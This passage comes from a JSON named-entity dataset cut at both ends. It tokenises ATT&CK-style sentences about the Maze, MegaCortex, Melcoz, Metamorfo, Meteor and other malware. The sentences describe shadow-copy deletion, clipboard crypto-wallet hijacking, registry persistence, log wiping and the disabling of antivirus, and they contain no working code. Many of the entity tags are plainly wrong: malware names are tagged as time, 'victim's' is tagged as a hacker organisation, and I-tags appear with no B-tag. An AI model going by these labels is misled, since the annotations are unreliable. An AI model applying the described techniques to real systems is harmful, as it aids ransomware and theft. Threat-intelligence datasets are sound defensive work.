"Maze", - "has", - "created", - "scheduled", - "tasks", - "using", - "name", - "variants", - "such", - "as", - "\"Windows", - "Update", - "Security\",", - "\"Windows", - "Update", - "Security", - "Patches\",", - "and", - "\"Google", - "Chrome", - "Security", - "Update\",", - "to", - "launch", - "Maze", - "at", - "a", - "specific", - "time." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Maze", - "has", - "stopped", - "SQL", - "services", - "to", - "ensure", - "it", - "can", - "encrypt", - "any", - "database." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "B-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Maze", - "has", - "checked", - "the", - "language", - "of", - "the", - "infected", - "system", - "using", - "the", - "\"GetUSerDefaultUILanguage\"", - "function." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "Maze", - "has", - "checked", - "the", - "language", - "of", - "the", - "machine", - "with", - "function", - "<code>GetUserDefaultUILanguage</code>", - "and", - "terminated", - "execution", - "if", - "the", - "language", - "matches", - "with", - "an", - "entry", - "in", - "the", - "predefined", - "list." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Maze", - "has", - "used", - "the", - "\"WNetOpenEnumW\",", - "\"WNetEnumResourceW”,", - "“WNetCloseEnum”", - "and", - "“WNetAddConnection2W”", - "functions", - "to", - "enumerate", - "the", - "network", - "resources", - "on", - "the", - "infected", - "machine." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Maze", - "has", - "issued", - "a", - "shutdown", - "command", - "on", - "a", - "victim", - "machine", - "that,", - "upon", - "reboot,", - "will", - "run", - "the", - "ransomware", - "within", - "a", - "VM." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Maze", - "has", - "communicated", - "to", - "hard-coded", - "IP", - "addresses", - "via", - "HTTP." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "The", - "Maze", - "encryption", - "process", - "has", - "used", - "batch", - "scripts", - "with", - "various", - "commands." - ], - "ner_tags": [ - "O", - "B-Tool", - "O", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Maze", - "has", - "used", - "WMI", - "to", - "attempt", - "to", - "delete", - "the", - "shadow", - "volumes", - "on", - "a", - "machine,", - "and", - "to", - "connect", - "a", - "virtual", - "machine", - "to", - "the", - "network", - "domain", - "of", - "the", - "victim", - "organization's", - "network." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MechaFlounder", - "has", - "the", - "ability", - "to", - "send", - "the", - "compromised", - "user's", - "account", - "name", - "and", - "hostname", - "within", - "a", - "URL", - "to", - "C2." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "B-Features", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MechaFlounder", - "has", - "the", - "ability", - "to", - "upload", - "and", - "download", - "files", - "to", - "and", - "from", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MechaFlounder", - "has", - "been", - "downloaded", - "as", - "a", - "file", - "named", - "lsass.exe,", - "which", - "matches", - "the", - "legitimate", - "Windows", - "file." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MechaFlounder", - "uses", - "a", - "python-based", - "payload." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "MechaFlounder", - "has", - "the", - "ability", - "to", - "use", - "base16", - "encoded", - "strings", - "in", - "C2." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MechaFlounder", - "has", - "the", - "ability", - "to", - "identify", - "the", - "username", - "and", - "hostname", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MechaFlounder", - "has", - "the", - "ability", - "to", - "use", - "HTTP", - "in", - "communication", - "with", - "C2." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MechaFlounder", - "has", - "the", - "ability", - "to", - "run", - "commands", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MegaCortex", - "can", - "enable", - "<code>SeDebugPrivilege</code>", - "and", - "adjust", - "token", - "privileges." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "MegaCortex", - "has", - "changed", - "user", - "account", - "passwords", - "and", - "logged", - "users", - "off", - "the", - "system." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-Purp", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MegaCortex", - "has", - "used", - "code", - "signing", - "certificates", - "issued", - "to", - "fake", - "companies", - "to", - "bypass", - "security", - "controls." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "O", - "O", - "B-Org", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MegaCortex", - "has", - "used", - "the", - "open-source", - "library,", - "Mbed", - "Crypto,", - "and", - "generated", - "AES", - "keys", - "to", - "carry", - "out", - "the", - "file", - "encryption", - "process." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "B-Tool", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MegaCortex", - "has", - "used", - "a", - "Base64", - "key", - "to", - "decode", - "its", - "components." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MegaCortex", - "was", - "used", - "to", - "kill", - "endpoint", - "security", - "processes." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "I-Features", - "B-HackOrg", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "MegaCortex", - "can", - "wipe", - "deleted", - "data", - "from", - "all", - "drives", - "using", - "<code>cipher.exe</code>." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "MegaCortex", - "loads", - "<code>injecthelper.dll</code>", - "into", - "a", - "newly", - "created", - "<code>rundll32.exe</code>", - "process." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "MegaCortex", - "can", - "parse", - "the", - "available", - "drives", - "and", - "directories", - "to", - "determine", - "which", - "files", - "to", - "encrypt." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MegaCortex", - "has", - "deleted", - "volume", - "shadow", - "copies", - "using", - "<code>vssadmin.exe</code>." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "MegaCortex", - "has", - "added", - "entries", - "to", - "the", - "Registry", - "for", - "ransom", - "contact", - "information." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "After", - "escalating", - "privileges,", - "MegaCortex", - "calls", - "<code>TerminateProcess()</code>,", - "<code>CreateRemoteThread</code>,", - "and", - "other", - "Win32", - "APIs." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MegaCortex", - "has", - "used", - "<code>rundll32.exe</code>", - "to", - "load", - "a", - "DLL", - "for", - "file", - "encryption." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MegaCortex", - "can", - "stop", - "and", - "disable", - "services", - "on", - "the", - "system." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MegaCortex", - "has", - "checked", - "the", - "number", - "of", - "CPUs", - "in", - "the", - "system", - "to", - "avoid", - "being", - "run", - "in", - "a", - "sandbox", - "or", - "emulator." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MegaCortex", - "has", - "used", - "<code>.cmd</code>", - "scripts", - "on", - "the", - "victim's", - "system." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Melcoz", - "has", - "been", - "distributed", - "through", - "an", - "AutoIt", - "loader", - "script." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "Melcoz", - "can", - "monitor", - "the", - "victim's", - "browser", - "for", - "online", - "banking", - "sessions", - "and", - "display", - "an", - "overlay", - "window", - "to", - "manipulate", - "the", - "session", - "in", - "the", - "background." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "B-HackOrg", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Melcoz", - "can", - "monitor", - "content", - "saved", - "to", - "the", - "clipboard." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Melcoz", - "has", - "the", - "ability", - "to", - "steal", - "credentials", - "from", - "web", - "browsers." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "B-Purp", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Melcoz", - "can", - "use", - "DLL", - "hijacking", - "to", - "bypass", - "security", - "controls." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Melcoz", - "has", - "the", - "ability", - "to", - "download", - "additional", - "files", - "to", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Melcoz", - "has", - "gained", - "execution", - "through", - "victims", - "opening", - "malicious", - "links." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Melcoz", - "can", - "use", - "MSI", - "files", - "with", - "embedded", - "VBScript", - "for", - "execution." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-Way", - "B-SamFile", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Melcoz", - "has", - "been", - "packed", - "with", - "VMProtect", - "and", - "Themida." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Melcoz", - "has", - "been", - "spread", - "through", - "malicious", - "links", - "embedded", - "in", - "e-mails." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Melcoz", - "can", - "monitor", - "the", - "clipboard", - "for", - "cryptocurrency", - "addresses", - "and", - "change", - "the", - "intended", - "address", - "to", - "one", - "controlled", - "by", - "the", - "adversary." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Melcoz", - "can", - "use", - "VBS", - "scripts", - "to", - "execute", - "malicious", - "DLLs." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Metamorfo", - "can", - "enumerate", - "all", - "windows", - "on", - "the", - "victim’s", - "machine." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Metamorfo's", - "C2", - "communication", - "has", - "been", - "encrypted", - "using", - "OpenSSL." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Metamorfo", - "has", - "automatically", - "collected", - "mouse", - "clicks,", - "continuous", - "screenshots", - "on", - "the", - "machine,", - "and", - "set", - "timers", - "to", - "collect", - "the", - "contents", - "of", - "the", - "clipboard", - "and", - "website", - "browsing." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "B-HackOrg", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Metamorfo", - "has", - "a", - "function", - "to", - "hijack", - "data", - "from", - "the", - "clipboard", - "by", - "monitoring", - "the", - "contents", - "of", - "the", - "clipboard", - "and", - "replacing", - "the", - "cryptocurrency", - "wallet", - "with", - "the", - "attacker's." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-HackOrg" - ] - }, - { - "tokens": [ - "Metamorfo", - "has", - "digitally", - "signed", - "executables", - "using", - "AVAST", - "Software", - "certificates." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "Metamorfo", - "has", - "side-loaded", - "its", - "malicious", - "DLL", - "file." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "Metamorfo", - "has", - "used", - "YouTube", - "to", - "store", - "and", - "hide", - "C&C", - "server", - "domains." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Upon", - "execution,", - "Metamorfo", - "has", - "unzipped", - "itself", - "after", - "being", - "downloaded", - "to", - "the", - "system", - "and", - "has", - "performed", - "string", - "decryption." - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Metamorfo", - "has", - "a", - "function", - "to", - "kill", - "processes", - "associated", - "with", - "defenses", - "and", - "can", - "prevent", - "certain", - "processes", - "from", - "launching." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Metamorfo", - "has", - "injected", - "a", - "malicious", - "DLL", - "into", - "the", - "Windows", - "Media", - "Player", - "process", - "(wmplayer.exe)." - ], - "ner_tags": [ - "B-Idus", - "O", - "I-Way", - "I-Way", - "B-Way", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "Metamorfo", - "has", - "encrypted", - "payloads", - "and", - "strings." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Metamorfo", - "can", - "send", - "the", - "data", - "it", - "collects", - "to", - "the", - "C2", - "server." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Metamorfo", - "has", - "deleted", - "itself", - "from", - "the", - "system", - "after", - "execution." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Metamorfo", - "has", - "searched", - "the", - "Program", - "Files", - "directories", - "for", - "specific", - "folders", - "and", - "has", - "searched", - "for", - "strings", - "related", - "to", - "its", - "mutexes." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Metamorfo", - "has", - "displayed", - "fake", - "forms", - "on", - "top", - "of", - "banking", - "sites", - "to", - "intercept", - "credentials", - "from", - "victims." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Metamorfo", - "has", - "hidden", - "its", - "GUI", - "using", - "the", - "ShowWindow()", - "WINAPI", - "call." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "Metamorfo", - "has", - "a", - "command", - "to", - "delete", - "a", - "Registry", - "key", - "it", - "uses,", - "<code>\\Software\\Microsoft\\Internet", - "Explorer\\notes</code>." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Metamorfo", - "has", - "used", - "MSI", - "files", - "to", - "download", - "additional", - "files", - "to", - "execute." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Metamorfo", - "includes", - "payloads", - "written", - "in", - "JavaScript." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Metamorfo", - "has", - "a", - "command", - "to", - "launch", - "a", - "keylogger", - "and", - "capture", - "keystrokes", - "on", - "the", - "victim’s", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Metamorfo", - "requires", - "the", - "user", - "to", - "double-click", - "the", - "executable", - "to", - "run", - "the", - "malicious", - "HTA", - "file", - "or", - "to", - "download", - "a", - "malicious", - "installer." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Metamorfo", - "has", - "disguised", - "an", - "MSI", - "file", - "as", - "the", - "Adobe", - "Acrobat", - "Reader", - "Installer", - "and", - "has", - "masqueraded", - "payloads", - "as", - "OneDrive,", - "WhatsApp,", - "or", - "Spotify,", - "for", - "example." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "Metamorfo", - "has", - "written", - "process", - "names", - "to", - "the", - "Registry,", - "disabled", - "IE", - "browser", - "features,", - "deleted", - "Registry", - "keys,", - "and", - "changed", - "the", - "ExtendedUIHoverTime", - "key." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Tool", - "O", - "O", - "O", - "B-HackOrg", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Metamorfo", - "has", - "used", - "mshta.exe", - "to", - "execute", - "a", - "HTA", - "payload." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Metamorfo", - "has", - "used", - "MsiExec.exe", - "to", - "automatically", - "execute", - "files." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Metamorfo", - "has", - "used", - "native", - "WINAPI", - "calls." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "Metamorfo", - "has", - "used", - "raw", - "TCP", - "for", - "C2." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Metamorfo", - "has", - "communicated", - "with", - "hosts", - "over", - "raw", - "TCP", - "on", - "port", - "9999." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Metamorfo", - "has", - "downloaded", - "a", - "zip", - "file", - "for", - "execution", - "on", - "the", - "system." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Metamorfo", - "has", - "performed", - "process", - "name", - "checks", - "and", - "has", - "monitored", - "applications." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Metamorfo", - "has", - "configured", - "persistence", - "to", - "the", - "Registry", - "key", - "<code>HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run,", - "Spotify", - "=%", - "APPDATA%\\Spotify\\Spotify.exe</code>", - "and", - "used", - ".LNK", - "files", - "in", - "the", - "startup", - "folder", - "to", - "achieve", - "persistence." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "I-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Metamorfo", - "can", - "collect", - "screenshots", - "of", - "the", - "victim’s", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Metamorfo", - "collects", - "a", - "list", - "of", - "installed", - "antivirus", - "software", - "from", - "the", - "victim’s", - "system." - ], - "ner_tags": [ - "B-SamFile", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Metamorfo", - "had", - "used", - "AutoIt", - "to", - "load", - "and", - "execute", - "the", - "DLL", - "payload." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Metamorfo", - "has", - "searched", - "the", - "compromised", - "system", - "for", - "banking", - "applications." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Metamorfo", - "has", - "used", - "VMProtect", - "to", - "pack", - "and", - "protect", - "files." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Metamorfo", - "has", - "been", - "delivered", - "to", - "victims", - "via", - "emails", - "with", - "malicious", - "HTML", - "attachments." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "Metamorfo", - "has", - "encrypted", - "C2", - "commands", - "with", - "AES-256." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Idus" - ] - }, - { - "tokens": [ - "Metamorfo", - "has", - "collected", - "the", - "hostname", - "and", - "operating", - "system", - "version", - "from", - "the", - "compromised", - "host." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Metamorfo", - "has", - "collected", - "the", - "username", - "from", - "the", - "victim's", - "machine." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Metamorfo", - "uses", - "JavaScript", - "to", - "get", - "the", - "system", - "time." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "O", - "B-Purp", - "O", - "O" - ] - }, - { - "tokens": [ - "Metamorfo", - "has", - "a", - "function", - "that", - "can", - "watch", - "the", - "contents", - "of", - "the", - "system", - "clipboard", - "for", - "valid", - "bitcoin", - "addresses,", - "which", - "it", - "then", - "overwrites", - "with", - "the", - "attacker's", - "address." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Metamorfo", - "has", - "embedded", - "a", - "\"vmdetect.exe\"", - "executable", - "to", - "identify", - "virtual", - "machines", - "at", - "the", - "beginning", - "of", - "execution." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Metamorfo", - "has", - "used", - "VBS", - "code", - "on", - "victims’", - "systems." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Metamorfo", - "has", - "used", - "HTTP", - "for", - "C2." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "Metamorfo", - "has", - "used", - "<code>cmd.exe", - "/c</code>", - "to", - "execute", - "files." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Meteor", - "has", - "the", - "ability", - "to", - "change", - "the", - "password", - "of", - "local", - "users", - "on", - "compromised", - "hosts", - "and", - "can", - "log", - "off", - "users." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "I-Purp", - "O" - ] - }, - { - "tokens": [ - "Meteor", - "can", - "use", - "Wevtutil", - "to", - "remove", - "Security,", - "System", - "and", - "Application", - "Event", - "Viewer", - "logs." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Meteor", - "can", - "fill", - "a", - "victim's", - "files", - "and", - "directories", - "with", - "zero-bytes", - "in", - "replacement", - "of", - "real", - "content", - "before", - "deleting", - "them." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Meteor", - "can", - "attempt", - "to", - "uninstall", - "Kaspersky", - "Antivirus", - "or", - "remove", - "the", - "Kaspersky", - "license;", - "it", - "can", - "also", - "add", - "all", - "files", - "and", - "folders", - "related", - "to", - "the", - "attack", - "to", - "the", - "Windows", - "Defender", - "exclusion", - "list." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-Time", - "O", - "O", - "O", - "O", 